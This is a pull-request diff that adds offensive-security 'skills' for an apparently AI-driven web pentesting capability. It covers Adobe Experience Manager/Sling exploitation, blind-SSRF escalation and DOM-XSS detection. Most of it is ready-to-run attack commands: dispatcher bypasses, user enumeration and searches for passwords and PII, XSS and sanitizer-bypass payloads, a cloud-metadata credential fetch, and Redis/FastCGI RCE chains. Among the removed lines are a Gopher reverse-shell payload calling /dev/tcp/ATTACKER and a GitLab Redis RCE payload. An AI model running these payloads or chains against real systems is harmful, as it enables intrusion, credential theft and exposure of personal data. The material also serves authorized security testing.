### PR TITLE
feat: CAP-989: Port 5 optimized skills to web-security capability + aem-sling-exploitation

### DIFF
--- a/capabilities/web-security/capability.yaml
+++ b/capabilities/web-security/capability.yaml
@@ -4,10 +4,10 @@ version: "1.0.3"
 description: >
   Web application penetration testing with 30+ attack technique playbooks
   covering request smuggling, cache poisoning, SSRF, SSTI, DOM
-  vulnerabilities, authentication bypasses, parser differentials, and
-  client-side attacks. Includes HTTP client tooling, Caido proxy
-  integration via MCP, credential management, DNS rebinding, phone
-  verification, and vulnerability verification.
+  vulnerabilities, authentication bypasses, parser differentials,
+  AEM/Sling exploitation, and client-side attacks. Includes HTTP client
+  tooling, Caido proxy integration via MCP, credential management, DNS
+  rebinding, phone verification, and vulnerability verification.
 
 mcp:
   servers:
@@ -122,3 +122,7 @@ keywords:
   - dns-rebinding
   - dom-security
   - phone-verification
+  - aem
+  - adobe-experience-manager
+  - sling
+  - dispatcher-bypass

--- a/capabilities/web-security/skills/aem-sling-exploitation/SKILL.md
+++ b/capabilities/web-security/skills/aem-sling-exploitation/SKILL.md
@@ -1,0 +1,200 @@
+---
+name: aem-sling-exploitation
+description: Adobe Experience Manager (AEM) and Apache Sling exploitation — Sling selector abuse, dispatcher bypass chains, JCR enumeration, QueryBuilder exploitation, XSS gadgets, and sensitive data mining. Use when AEM detected (granite login, /etc.clientlibs, /content paths, Sling headers) or when testing Adobe CMS targets.
+---
+
+AEM security testing via Sling resource resolution abuse. Complements `hopgoblin` (CVE scanner) with manual exploitation methodology derived from 600+ AEM CVE research.
+
+## 1. Fingerprint and version detect
+
+```bash
+# Granite login page (confirms AEM)
+curl -sk "https://TARGET/libs/granite/core/content/login.html"
+
+# System console (author instance, often blocked)
+curl -sk "https://TARGET/system/console"
+
+# ClientLibs — dotted = modern proxy, slashed = legacy (suggests /etc open for reads)
+curl -sk -o /dev/null -w "%{http_code}" "https://TARGET/etc.clientlibs/"
+curl -sk -o /dev/null -w "%{http_code}" "https://TARGET/etc/clientlibs/"
+
+# Version detection via listParagraphs + About page (bypasses dispatcher)
+curl -sk "https://TARGET/content/dam.listParagraphs.html?itemResourceType=/libs/granite/ui/components/shell/help/about/about.jsp&limit=1"
+
+# CSRF token endpoint (confirms Granite auth framework)
+curl -sk "https://TARGET/libs/granite/csrf/token.json"
+
+# Current user identity (unauthenticated = anonymous)
+curl -sk "https://TARGET/libs/granite/security/currentuser.json"
+
+# User info endpoint
+curl -sk "https://TARGET/libs/cq/security/userinfo.json"
+```
+
+**Deployment:** AMS (self-hosted, full attack surface) vs Cloud Service (locked down, no write-to-executable paths).
+
+## 2. Sling URL anatomy
+
+```
+scheme://host/path/resource.selector1.selector2.extension/suffix?query
+                    ^^^^^^^^ ^^^^^^^^^ ^^^^^^^^^ ^^^^^^^^^ ^^^^^^
+                    resource  sel 1     sel 2    extension  suffix
+```
+
+**Resolution order:**
+1. Java servlet registered with exact path
+2. Java servlet by `sling:resourceType`, selector, primary type, or extension
+3. `sling:resourceType` pointing to JSP/HTL in `/apps`
+4. Same lookup falling through to `/libs`
+5. `DefaultGETServlet` as catch-all (enables `.infinity.json` for recursive dumps)
+
+**Key insight:** Dispatcher matches raw path; Sling resolves selectors/suffixes server-side. This mismatch enables all dispatcher bypasses. POST → SlingPostServlet (node creation), DELETE → node removal (AMS write-path exploitation).
+
+## 3. Core selector exploits
+
+### rawcontent (reflected XSS, patched APSB22-40)
+
+Registered on CQ Page with `.html` extension. Original purpose: strip JS/CSS for content export. Used unsafe HTML serializer that re-emitted sanitized HTML escapes as raw HTML.
+
+```bash
+# Stored XSS — if author-controllable content exists
+curl -sk "https://TARGET/content/site/page.rawcontent.html"
+
+# Reflected XSS via 404 page (path reflected as raw HTML)
+curl -sk "https://TARGET/content/nonexistent%3Cimg%20src=x%20onerror=alert(1)%3E.rawcontent.html"
+
+# Chain with savedsearch for 400 error reflection when 404 is patched
+curl -sk "https://TARGET/content/nonexistent.savedsearch.rawcontent.html"
+```
+
+**Status:** Patched by swapping `htmlwriter` to `html5-serializer`. Test on unpatched AMS instances.
+
+### listParagraphs (CVE-2022-42348 XSS, APSB22-59)
+
+Accepts `itemResourceType` query param to re-render against arbitrary resource type. Bypasses dispatcher because Sling resolves `/libs` JSPs internally. (Note: CVE-2022-42351 in the same bulletin is an open redirect, not XSS.)
+
+```bash
+# Reach QueryBuilder via /libs JSP
+curl -sk "https://TARGET/content/dam.listParagraphs.html?itemResourceType=/libs/cq/statistics/components/queries-by-result/html.jsp&limit=1&path=/"
+
+# Reflected XSS via path param in queries-by-result JSP
+curl -sk "https://TARGET/content/dam.listParagraphs.html?itemResourceType=/libs/cq/statistics/components/queries-by-result/html.jsp&limit=1&path=<img+src=x+onerror=alert(document.domain)>"
+
+# Version fingerprint via About page
+curl -sk "https://TARGET/content/dam.listParagraphs.html?itemResourceType=/libs/granite/ui/components/shell/help/about/about.jsp&limit=1"
+```
+
+### form (CVE-2024-26029)
+
+Registered on `sling/servlet/default` with no extension restriction — matches every JCR node. Internally forwards the suffix as the new path.
+
+```bash
+# Bypass dispatcher block on /bin/querybuilder.json
+curl -sk "https://TARGET/content/dam.form.css/bin/querybuilder.json?path=/&p.limit=10"
+curl -sk "https://TARGET/content/dam.form.js/bin/querybuilder.json?path=/&p.limit=10"
+curl -sk "https://TARGET/content/dam.form.html/bin/querybuilder.json?path=/&p.limit=10"
+
+# Chain form + listParagraphs (double dispatcher bypass)
+curl -sk "https://TARGET/content/site/page.form.js/content/site/page.listParagraphs.html?itemResourceType=/libs/cq/statistics/components/queries-by-result/html.jsp&path=/"
+```
+
+## 4. JCR enumeration and data mining
+
+Once QueryBuilder or JSON selectors are reachable:
+
+```bash
+# Shallow enumeration (avoids 10K node limit)
+curl -sk "https://TARGET/.1.json"
+curl -sk "https://TARGET/content.1.json"
+curl -sk "https://TARGET/content/dam.1.json"
+
+# Deeper enumeration
+curl -sk "https://TARGET/content/dam.2.json"
+curl -sk "https://TARGET/content/dam.3.json"
+
+# Full recursive dump (use with caution — can be large)
+curl -sk "https://TARGET/content/dam.infinity.json"
+
+# QueryBuilder: enumerate users
+curl -sk "https://TARGET/bin/querybuilder.json?path=/home/users&p.limit=-1&type=rep:User"
+
+# QueryBuilder: search for sensitive content
+curl -sk "https://TARGET/bin/querybuilder.json?path=/content&fulltext=password&p.limit=10"
+curl -sk "https://TARGET/bin/querybuilder.json?path=/content&fulltext=confidential&p.limit=10"
+
+# DAM assets (often contain PII: spreadsheets, internal docs)
+curl -sk "https://TARGET/bin/querybuilder.json?path=/content/dam&type=dam:Asset&p.limit=50"
+
+# Package listing (deployment artifacts, may contain source)
+curl -sk "https://TARGET/etc/packages.json"
+curl -sk "https://TARGET/crx/packmgr/list.jsp"
+```
+
+**Sensitive data locations:** Employee lists with SSNs, plaintext credentials, IP inventories, architecture docs, and "strictly confidential" documents regularly found under `/content` and `/content/dam`.
+
+## 5. Default permissions footgun
+
+The anonymous user belongs to the `everyone` group by default. Every "open to all users" JCR ACL also applies to unauthenticated visitors. Test:
+
+```bash
+# Check anonymous access to /libs, /apps, /etc
+for path in /libs /apps /etc /content /home; do
+  code=$(curl -sk -o /dev/null -w "%{http_code}" "https://TARGET${path}.1.json")
+  echo "$path → $code"
+done
+```
+
+## 6. Dispatcher bypass patterns
+
+See [dispatcher-bypass-patterns.md](dispatcher-bypass-patterns.md) for extension confusion, selector stacking, path encoding, and semicolon path parameter techniques.
+
+## 7. Custom selector discovery
+
+AEM customers register custom selectors via `@SlingServlet` annotations. These are unaudited attack surface.
+
+```bash
+# If /etc/packages is readable, download and grep for servlet registrations
+curl -sk "https://TARGET/crx/packmgr/list.jsp" | grep -o '"name":"[^"]*"'
+
+# After obtaining packages, search for:
+# @SlingServlet annotations, resourceTypes registrations, selector bindings
+grep -rn "@SlingServlet\|sling:resourceType\|sling:selector" extracted_package/
+
+# Brute-force common selectors on content paths
+for sel in rawcontent listParagraphs form savedsearch feed json xml model tidy; do
+  code=$(curl -sk -o /dev/null -w "%{http_code}" "https://TARGET/content/dam.${sel}.html")
+  echo "$sel → $code"
+done
+```
+
+## 8. AEM-specific XSS gadgets
+
+See [xss-gadgets.md](xss-gadgets.md) for moment.js format injection, jQuery `.text()` entity re-decoding (post-DOMPurify bypass), and `javascript:` URI property population techniques.
+
+## 9. Methodology phases
+
+**Phase 1 — Fingerprint:** Granite login, clientlibs version, currentuser.json, version via listParagraphs+About page. Determine AMS vs Cloud Service.
+
+**Phase 2 — Primitive testing:** rawcontent+savedsearch on non-existent paths, listParagraphs with itemResourceType, form selector suffix forwarding to /bin/querybuilder.json.
+
+**Phase 3 — Data mining:** Once QueryBuilder is reachable, walk JCR with `.1.json` selectors. Drill into internal folders. Search for spreadsheets, credentials, architecture docs, "do not publish" drafts.
+
+**Phase 4 — Custom selectors:** Grab /etc/packages if readable. Grep for SlingServlet annotations and resourceType registrations. Each custom selector is fresh attack surface.
+
+**Phase 5 — Chain for impact:** Dispatcher bypass alone is not a finding. Chain: form bypass → QueryBuilder → user enumeration → PII exposure. Or: listParagraphs → /libs JSP → reflected XSS.
+
+## 10. Defense assessment
+
+**What fails:** Dispatcher rules (path-based, miss selectors/suffixes), WAF blocks (encoding bypasses).
+
+**What works:** JCR-level ACLs (deny anonymous on /libs, /etc, /home, internal /content paths). AEM upgrades that remove vulnerable selectors at the servlet level.
+
+**Key check:** If dispatcher blocks are the only defense, they can be bypassed. If JCR ACLs are in place, selector abuse hits 403 at the Sling layer — game over.
+
+## Chain With
+- `apache-confusion-attacks` (if Apache httpd fronts AEM dispatcher)
+- `403-bypass` (dispatcher returns 403, try header/path manipulation)
+- `dom-vulnerability-detection` (for AEM-specific XSS gadgets in client JS)
+- `parser-differential-bypass` (dispatcher vs Sling parsing differences)
+- `write-path-to-rce` (if file write is achievable on AMS instances)
+- **hopgoblin** (external tool) — automated AEM CVE scanner, run first for known vulns

--- a/capabilities/web-security/skills/aem-sling-exploitation/dispatcher-bypass-patterns.md
+++ b/capabilities/web-security/skills/aem-sling-exploitation/dispatcher-bypass-patterns.md
@@ -1,0 +1,21 @@
+# Dispatcher Bypass Patterns
+
+When direct paths are blocked, use selector/suffix manipulation:
+
+```bash
+# Extension confusion
+curl -sk "https://TARGET/bin/querybuilder.json"        # blocked
+curl -sk "https://TARGET/content/dam.form.css/bin/querybuilder.json"  # bypass via form suffix
+
+# Selector stacking
+curl -sk "https://TARGET/content/page.listParagraphs.html"  # blocked
+curl -sk "https://TARGET/content/page.form.js/content/page.listParagraphs.html"  # form → listParagraphs
+
+# Path encoding
+curl -sk "https://TARGET/content/dam.form.css/bin/querybuilder.json"
+curl -sk "https://TARGET/content/dam.form.css/%62in/querybuilder.json"
+
+# Semicolon path parameters (Sling ignores, dispatcher may not parse)
+curl -sk "https://TARGET/bin/querybuilder.json;.css"
+curl -sk "https://TARGET/bin/querybuilder.json;x=.ico"
+```

--- a/capabilities/web-security/skills/aem-sling-exploitation/xss-gadgets.md
+++ b/capabilities/web-security/skills/aem-sling-exploitation/xss-gadgets.md
@@ -1,0 +1,30 @@
+# AEM-Specific XSS Gadgets
+
+### moment.js format injection
+If user input controls `moment().format()` argument and output hits innerHTML:
+```javascript
+moment().format("[<img src=x onerror=alert(document.domain)>]")
+// Square brackets = literal output in moment.js format strings
+```
+
+### jQuery .text() entity re-decoding
+Post-DOMPurify bypass chain:
+```javascript
+// Vulnerable pattern:
+const clean = DOMPurify.sanitize(value);        // entities pass through
+const $el = $('<div>' + clean + '</div>');       // browser decodes entities
+const text = $el.text();                          // reads decoded text
+el.innerHTML = text;                              // re-parses as HTML → XSS
+
+// Payload: &lt;img src=x onerror=alert(document.domain)&gt;
+// DOMPurify sees entities (safe) → browser decodes → .text() reads raw tags → innerHTML executes
+```
+
+### javascript: URI property population
+```javascript
+let u = new URL("javascript://example.com:443/path?key=val#frag%0aalert(document.domain)");
+// u.hostname === "example.com"   (passes allowlist checks)
+// u.pathname === "/path"          (passes path validation)
+// u.port === "443"                (passes port checks)
+// After javascript: scheme is stripped, // starts a JS single-line comment. %0a newline ends it. Code after executes.
+```

--- a/capabilities/web-security/skills/blind-ssrf-chains/SKILL.md
+++ b/capabilities/web-security/skills/blind-ssrf-chains/SKILL.md
@@ -1,82 +1,129 @@
 ---
 name: blind-ssrf-chains
-description: Service-specific SSRF escalation payloads and canary techniques. Use when blind SSRF is confirmed to escalate impact via internal services (Redis, Elasticsearch, Docker, Jenkins, Consul, Solr, Jira, GitLab).
+description: "Escalate blind SSRF to proven impact via internal service canaries, port fingerprinting, and chained exploitation targeting Redis, Docker API, Jenkins, and cloud metadata. Use when blind SSRF is confirmed but you need to demonstrate CIA impact beyond 'I can reach internal hosts.'"
 ---
-
 # Blind SSRF Chains
 
-Escalate blind SSRF to RCE/data exfil by targeting internal services that make secondary outbound requests or accept destructive commands.
+You have blind SSRF. You can hit internal IPs but get no response body. The program will reject "I can reach 127.0.0.1." You need to prove impact.
 
-## When to Use
+## Constraint Assessment (do this FIRST)
 
-- Blind SSRF confirmed (can hit internal IPs, no response body)
-- Need to prove impact beyond "I can reach internal hosts"
-- Internal service fingerprinting via response timing/size differentials
+Before attempting any chain, map what your SSRF primitive actually allows. Most techniques below require specific capabilities — if your primitive is constrained, skip to the viable subset.
 
-## When NOT to Use
+| Constraint | What it blocks | What remains viable |
+|---|---|---|
+| HTTPS-only (no HTTP) | Redis, FastCGI, Memcache, most internal services, **cloud metadata** (IMDSv1 is HTTP on 169.254.169.254:80) | Canaries on HTTPS internal services only; cloud metadata blocked unless IMDSv2 on HTTPS or instance identity endpoint available |
+| No Gopher protocol | Redis cmd injection, FastCGI, MySQL, Memcache | HTTP-only targets: Jenkins, Solr, Docker API, Consul, cloud metadata |
+| No port specification | Port scanning, non-standard service targeting | Default-port services only (80/443), cloud metadata (169.254.169.254) |
+| No query parameters | Solr shard canary, Jenkins crumbIssuer, most canary endpoints | Path-only targets: Docker `/containers/json`, cloud metadata, Elasticsearch `/_search` |
+| No redirect following | Redirect-based protocol downgrade, SSRF redirect chains | Direct-hit targets only |
+| POST-only / fixed body | GET-based canary endpoints, Jenkins script compilation | POST-accepting endpoints (Docker API create, some webhooks) |
+| No response body or timing oracle | Fingerprinting, all response-based inference | OOB callbacks only (if outbound from internal services) |
 
-- Full SSRF with response body (read response directly instead)
-- No confirmed SSRF yet (use ssrf-ip-filter-bypass or ssrf-redirect-loop first)
+**If your primitive is POST-only + HTTPS-only + no ports + no query params + no redirects + blind:** Standard chains are all blocked. Note: HTTPS-only also blocks standard cloud metadata (IMDSv1 at 169.254.169.254 is HTTP on port 80). Your only paths are: (1) self-referencing SSRF to internal subdomains on 443 that make secondary outbound requests, (2) DNS rebinding to bypass IP restrictions. If none of these are viable, document the blind SSRF as a lead and move on — don't burn context on dead chains.
 
-## SSRF Canary Concept
+## The Canary Principle
 
-Chain: `attacker -> SSRF -> internal service -> outbound request -> OOB callback`
+Don't try to read responses from the SSRF — find internal services that make **secondary outbound requests** to infrastructure you control. The chain: your request → SSRF → internal service → outbound fetch → your OOB callback. The callback proves the internal service exists AND is exploitable.
 
-Services that make outbound requests when hit via SSRF: Confluence, Jira, Jenkins, Solr, Weblogic, Hystrix Dashboard, W3 Total Cache. Hit them internally, they fetch your callback URL, confirming exploitation.
+**OOB callback setup**: Use the `CallbackClient` tool to register a callback URL before testing. Request HTTPS protocol — many internal services only make HTTPS outbound requests. After triggering the SSRF chain, check for received callbacks to confirm the internal service made an outbound request.
 
-## Fingerprinting (Blind)
+Canary-capable services: Confluence, Jira, Jenkins, Solr, Weblogic, Hystrix Dashboard. These all have endpoints that fetch attacker-controlled URLs as part of normal functionality.
 
-| Signal | Technique |
-|--------|-----------|
-| Status code delta | Live service returns 200; dead port returns 500/timeout |
-| Response size delta | Compare byte count of hit vs miss |
-| Timing delta | Connected ports respond faster than filtered |
-| Error oracle | Distinct error strings reveal service presence |
+## Fingerprinting Without Response Bodies
 
-## Service Payloads
+You can't see responses, but you can measure:
 
-### Elasticsearch (9200)
+- **Status code delta** — live service returns 200, dead port returns 500/timeout. The SSRF endpoint leaks this through its own response behavior.
+- **Response size delta** — byte count differs between hit and miss. Even 1 byte difference confirms service presence.
+- **Timing delta** — connected ports respond faster than filtered. Measurable even through the SSRF proxy layer.
+- **Error oracle** — the SSRF endpoint's error handler may leak distinct strings per backend failure mode.
+
+Combine these to port-scan internally and build a service map before attempting exploitation.
+
+## Target Prioritization
+
+When you've confirmed internal reachability, prioritize by **impact density** — services where a single unauthenticated request yields RCE or data access:
+
+1. **Redis (6379)** — Gopher protocol to inject commands. Cron write = RCE. If GitLab is present, Redis queue injection = RCE via Resque workers.
+2. **Docker API (2375/2376)** — Unauthenticated container creation with host bind mount = instant RCE. Check `/containers/json` first.
+3. **Consul/etcd (8500/2379)** — Service registration + health check callbacks to canary. May contain secrets in KV store.
+4. **Jenkins (8080)** — Groovy script compilation endpoint accepts `@Grab` annotations that fetch from attacker URLs. Pre-auth on many installs.
+5. **Elasticsearch (9200)** — Data exfil via `/_search`. Older versions allow shutdown via `/_shutdown`.
+6. **FastCGI (9000)** — Gopher to inject PHP via `auto_prepend_file`. Use Gopherus to generate payloads.
+7. **Solr (8983)** — Shard parameter accepts arbitrary URLs (canary). XXE via `xmlparser` query parser.
+8. **Jira/Confluence (8080/8443)** — Multiple CVEs with unauthenticated SSRF endpoints that act as canaries.
+
+## Example: Blind SSRF → Port Scan → HTTP Canary → Cloud Metadata
+
+```bash
+# 1. Get OOB callback URL (use CallbackClient tool)
+# CALLBACK=<your callback URL from CallbackClient>
+
+# 2. Port scan internal services via timing
+for port in 6379 8080 8983 9200 2375; do
+  t=$(curl -s -o /dev/null -w "%{time_total}" "$TARGET/fetch?url=http://127.0.0.1:$port/")
+  echo "Port $port: ${t}s"
+done
+# Fast response = open port. Timeout = closed/filtered.
+
+# 3. Fingerprint Jenkins on internal port 8080 (pre-auth crumbIssuer)
+curl -s -o /dev/null -w "%{http_code}" \
+  "$TARGET/fetch?url=http://127.0.0.1:8080/crumbIssuer/api/json"
+# 200 = Jenkins present, 500/timeout = not Jenkins
+
+# 4. Use Solr shard parameter as canary (triggers outbound fetch)
+curl -s "$TARGET/fetch?url=http://127.0.0.1:8983/solr/admin/cores?action=STATUS%26shards=${CALLBACK}"
+
+# 5. Check for OOB callback — confirms internal Solr made outbound request
+# Use CallbackClient tool to check for received requests
+
+# 6. If callback received, escalate: cloud metadata via SSRF
+curl -s "$TARGET/fetch?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/"
 ```
-/_cluster/health
-/_cat/indices
+
+## Decision Logic
+
+```
+Blind SSRF confirmed
+  ├── Can you use Gopher protocol?
+  │     ├── Yes → Target Redis, FastCGI, Memcache (direct command injection)
+  │     └── No  → Target HTTP services only (Jenkins, Solr, Jira, Docker API)
+  ├── Do you need to prove outbound connectivity?
+  │     └── Use canary endpoints (Jenkins createToken, Solr shards, Jira icon-uri, Hystrix proxy.stream)
+  ├── Do you know the internal stack?
+  │     ├── Yes → Target the highest-impact service directly
+  │     └── No  → Fingerprint via timing/size deltas on common ports, then prioritize
+  └── Is cloud metadata reachable?
+        └── 169.254.169.254 → credentials → lateral movement (often higher impact than direct service exploitation)
 ```
 
-### Redis (6379) -- via Gopher to Cron RCE
-```
-gopher://127.0.0.1:6379/_*1%0d%0a$8%0d%0aflushall%0d%0a*3%0d%0a$3%0d%0aset%0d%0a$1%0d%0a1%0d%0a$64%0d%0a%0d%0a%0a%0a*/1 * * * * bash -i >& /dev/tcp/ATTACKER/2333 0>&1%0a%0a%0a%0a%0a%0d%0a%0d%0a%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$3%0d%0adir%0d%0a$16%0d%0a/var/spool/cron/%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$10%0d%0adbfilename%0d%0a$4%0d%0aroot%0d%0a*1%0d%0a$4%0d%0asave%0d%0aquit%0d%0a
-```
+## Example Chain: Gopher → Redis Cron Write → RCE
 
-### Docker (2375/2376)
-```
-/containers/json
-/secrets
-/services
-```
-RCE: `POST /containers/create` with privileged alpine + host bind mount.
+When the SSRF primitive supports Gopher protocol and Redis is on port 6379:
 
-### Jenkins (8080/8888)
-Canary: `/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.github.config.GitHubTokenCredentialsCreator/createTokenByPassword?apiUrl=http://CANARY/%23&login=a&password=b`
+```bash
+# 1. Generate Redis cron-write payload with Gopherus
+# Gopherus generates Gopher payloads for Redis, FastCGI, MySQL, PostgreSQL, Memcache
+gopherus --exploit redis  # select "RCE", enter reverse shell cron job
 
-### Solr (8983)
-Canary via shards: `/search?q=Apple&shards=http://CANARY/solr/collection/config%23`
+# 2. Send Gopher payload via SSRF (Redis on 192.168.1.10:6379)
+curl -s "$TARGET/fetch?url=gopher://192.168.1.10:6379/_%2A1%0D%0A%248%0D%0Aflushall%0D%0A..."
 
-### Jira/Confluence
-CVE-2017-9506: `/plugins/servlet/oauth/users/icon-uri?consumerUri=http://CANARY`
-CVE-2019-8451: `/plugins/servlet/gadgets/makeRequest?url=https://CANARY:443@example.com`
+# 3. Fallback: FastCGI on port 9000 via Gopher (PHP auto_prepend_file injection)
+gopherus --exploit fastcgi  # generates PHP code execution payload
+curl -s "$TARGET/fetch?url=gopher://192.168.1.10:9000/_%01%01..."
 
-### GitLab -- via Redis (6379)
-```
-git://[0:0:0:0:0:ffff:127.0.0.1]:6379/%0D%0A%20multi%0D%0A%20sadd%20resque:gitlab:queues%20system_hook_push%0D%0A%20lpush%20resque:gitlab:queue:system_hook_push%20%22{"class":"GitlabShellWorker","args":["class_eval","open('|CMD').read"]}%22%0D%0A%20exec%0D%0A/ssrf.git
+# 4. GitLab-specific: If Ruby/GitLab detected, inject into Redis Resque queue
+# instead of cron write — Resque workers execute serialized Ruby jobs from Redis
+# This gives RCE via GitLab's background job processor without writing to disk
 ```
 
-## Tools
-
-- **Gopherus** -- generates gopher payloads for MySQL, PostgreSQL, FastCGI, Redis, Memcache
-- **surf** -- `surf -l hosts.txt` to find internal-only IPs reachable via SSRF
+**Priority order**: Redis cron write (broadest) → GitLab Resque queue injection (if GitLab present, more reliable than cron) → FastCGI auto_prepend_file (requires PHP behind FastCGI).
 
 ## Chain With
 
-- **ssrf-ip-filter-bypass** -- bypass IP filters to reach internal services
-- **ssrf-redirect-loop** -- upgrade blind to visible via redirect chains
-- **OOB callbacks** -- register canary URLs for outbound request confirmation
-- **surf** -- identify which internal hosts are viable SSRF targets
+- **ssrf-ip-filter-bypass** — get past IP filters to reach internal services
+- **ssrf-redirect-loop** — upgrade blind to visible via redirect error differentials
+- **CallbackClient tool** — register OOB callback URLs for canary verification
+- **Gopherus** (external) — generate Gopher payloads for Redis, FastCGI, MySQL, PostgreSQL, Memcache

--- a/capabilities/web-security/skills/dom-vulnerability-detection/SKILL.md
+++ b/capabilities/web-security/skills/dom-vulnerability-detection/SKILL.md
@@ -1,168 +1,73 @@
 ---
 name: dom-vulnerability-detection
-description: DOM-based XSS and client-side vulnerability detection for code review and dynamic analysis. USE WHEN auditing JavaScript code, reviewing client-side security, analyzing DOM manipulation, testing postMessage handlers, checking URL validation, investigating client-side template injection (AngularJS, Vue.js, htmx), OR identifying attacker-controlled sources and dangerous sinks. Covers source tracing, sink identification, sanitization validation, browser quirks (DOM clobbering, mutation XSS), and framework-specific vulnerabilities.
+description: DOM-based XSS and client-side vulnerability detection via dynamic analysis — trace attacker-controlled sources to dangerous sinks, audit postMessage handlers, test CSTI in Angular/Vue/htmx, and check for DOM clobbering. Use when auditing JavaScript code, reviewing client-side security, analyzing DOM manipulation, or testing postMessage handlers.
 ---
 
-# DynamicDomVulnerabilityDetection
+## Sources (attacker-controlled input)
+`location.hash`, `location.search`, `location.href`, `document.URL`, `document.referrer`, `window.name`, `postMessage event.data`, `document.cookie`, `localStorage`/`sessionStorage`
 
-Comprehensive framework for identifying DOM-based cross-site scripting (XSS) and related client-side vulnerabilities during code review and dynamic analysis.
+## Sinks (dangerous output)
+`innerHTML`, `outerHTML`, `document.write()`, `eval()`, `setTimeout(string)`, `new Function()`, `location.href=`, `location.assign()`, `element.src=`, `jQuery.html()`, `$.globalEval()`, `v-html`, `ng-bind-html`, `dangerouslySetInnerHTML`
 
-## Overview
+## Analysis workflow
 
-DOM-based vulnerabilities occur when JavaScript reads data from an attacker-controlled source (for example, the URL or a cross-origin message) and sends it to a sink that interprets it as HTML or JavaScript. This skill summarizes the critical concepts and patterns needed to detect and exploit these issues, based on research across multiple security resources.
+### 1. Find sources reaching sinks
+```bash
+# Search for dangerous sinks in JS files
+grep -rn "innerHTML\|outerHTML\|document\.write\|\.html(" --include="*.js" --include="*.tsx" src/
+grep -rn "eval(\|setTimeout(\|setInterval(\|new Function(" --include="*.js" src/
 
-## When to Use This Skill
-
-Activate this skill whenever you are asked to:
-* Review JavaScript or HTML for potential cross-site scripting vulnerabilities
-* Assess whether user-controlled data can reach dangerous DOM APIs (innerHTML, document.write, eval, etc.)
-* Audit custom safe-URL helpers or regex filters for URL or input validation
-* Investigate cross-window messaging (postMessage) logic for origin and reference checks
-* Test single-page applications or front-end frameworks (AngularJS, Vue.js, htmx, etc.) for client-side template injection (CSTI)
-
-## Step-by-Step Analysis Framework
-
-### 1. Identify Attacker-Controlled Sources
-
-Look for any of the following sources of input. These can carry malicious payloads if not properly sanitised:
-
-* **Location:** `window.location`, `location.search`, `location.hash`, and related properties. Path and fragment data may be used without encoding.
-* **Referrer:** `document.referrer` can contain untrusted data.
-* **Cookies and storage:** Values from `document.cookie`, `localStorage`, etc., may originate from another subdomain or previous XSS.
-* **Window name:** `window.name` is cross-origin writable and readable.
-* **Messages:** Data passed via `postMessage` (the `e.data` property) is arbitrary and untrusted.
-
-Use search tools (Ctrl+Shift+F in DevTools or grep) to find these sources in JavaScript files.
-
-### 2. Trace the Data Flow
-
-After locating a source, trace each assignment or transformation until you reach a sink. Keep track of variable names as they are reassigned. Use breakpoints in DevTools to inspect variable values at runtime.
-
-### 3. Locate Dangerous Sinks
-
-Common DOM sinks include:
-
-* **HTML injection:** Assignments to `.innerHTML`, `.outerHTML`, `.insertAdjacentHTML`, calls to `document.write()`, `document.open()` ... `.write()` `.close()`, or jQuery's `.html()` and `.append()`.
-* **URL redirects:** Assigning unvalidated strings to `location`, `location.href`, `location.assign()`, `window.open()`, or setting attribute values such as `element.src` or `element.href`.
-* **Code execution:** Calls to `eval()`, `Function()`, `setTimeout()` or `setInterval()` with string arguments. jQuery's `$()` selector and other library helpers may implicitly call `.innerHTML`.
-* **Template expressions:** AngularJS attributes like `ng-init` and Vue.js interpolation (`{{ ... }}`) interpret input as code.
-
-If user-controlled data flows into any of these sinks, test for XSS by injecting a harmless payload such as `<img src onerror=alert(1)>` for HTML sinks, or `alert(1)` for JavaScript sinks. Remember that `<script>` tags do not execute when added via `.innerHTML`; use event handlers on `<img>` or `<iframe>` instead.
-
-### 4. Evaluate Sanitisation and Filters
-
-When filters or helpers are used, verify their correctness:
-
-* **Regex validation:** Ensure regular expressions anchor the start of the string (`^`) as well as the end (`$`). A trailing `$` alone allows attackers to prepend arbitrary HTML. Avoid patterns like `/([a-zA-Z0-9]+|\s)+$/` which only constrain the end of the string.
-* **Safe URL functions:** Be cautious of helpers that use `new URL(userInput, location)` and compare `.origin` against `window.location.origin`. If an attacker omits `//` in a URL (`https:example.com`), the relative parser may treat the URL as a local path, whereas the absolute parser will resolve to `https://example.com`. Parse the URL only once and validate both protocol and host.
-* **Type coercion:** Do not trust objects simply because they are not strings. Passing an array with a malicious `toString()` to a URL helper can produce `javascript:` schemes. Always check the type explicitly.
-
-### 5. Examine Browser Quirks
-
-Be aware of subtle DOM behaviours that can be abused:
-
-* **DOM clobbering:** HTML elements become global variables on `window` via their `id` attribute. An attacker can inject an element like `<img id="CONFIG_SRC" data-url="https://attacker.com/poc.js">` so that `window.CONFIG_SRC.dataset.url` points to a malicious script. Avoid using `window.<id>` to reference elements and use `document.getElementById()` instead.
-* **Race conditions:** When asynchronous functions like `requestIdleCallback()` load dynamic scripts, an attacker may manipulate elements between the check and the use. Ensure checks occur immediately before inserting the script and do not rely on timed order.
-* **Mutation XSS:** Some sanitizers (e.g. DOMPurify) can be bypassed when browsers re-interpret mutated HTML. Test payloads like `<svg><g onload=alert(1)></g></svg>` or unusual Unicode characters.
-
-### 6. Investigate postMessage Handlers
-
-Cross-window communication via `window.postMessage()` is a common source of client-side vulnerabilities. Follow these steps:
-
-1. **Enumerate handlers:** Search for `addEventListener('message', ...)` or assignments to `onmessage`. Use browser extensions like postMessage-tracker to log messages.
-2. **Verify origin checks:** A handler must strictly compare `e.origin` to an exact, whitelisted origin or to `window.location.origin`. Avoid `startsWith()` or `endsWith()` checks; subdomain tricks like `https://example.com.attacker.com` or `anythingexample.com` bypass them. Never compare to `window.origin`; this property can be `'null'` and is easily spoofed.
-3. **Inspect event.source:** Do not trust window references alone; attackers can hijack nested iframes or produce messages with `e.source=null` by deleting the iframe after sending the message. Always verify both the origin and the expected window reference.
-4. **Sanitise message data:** Do not call functions based on `e.data`. Attackers can craft structured clone objects (arrays with additional properties) so that `window[data.func](data)` or similar patterns will invoke `setTimeout`, `constructor.constructor`, or other built-in executors. Accept only primitive types or explicitly parse JSON to discard prototype properties.
-5. **Beware of null origins:** Sandboxed iframes (`<iframe sandbox="... allow-scripts">`) produce messages with `e.origin === 'null'`. Treat these as untrusted even when `window.origin` is also `'null'`.
-6. **Check ordering in comparisons:** When using helper functions like `isSameOrigin`, ensure you compare the trusted origin against the untrusted one in the correct order. Passing arguments in reverse may inadvertently accept `'null'` origins.
-
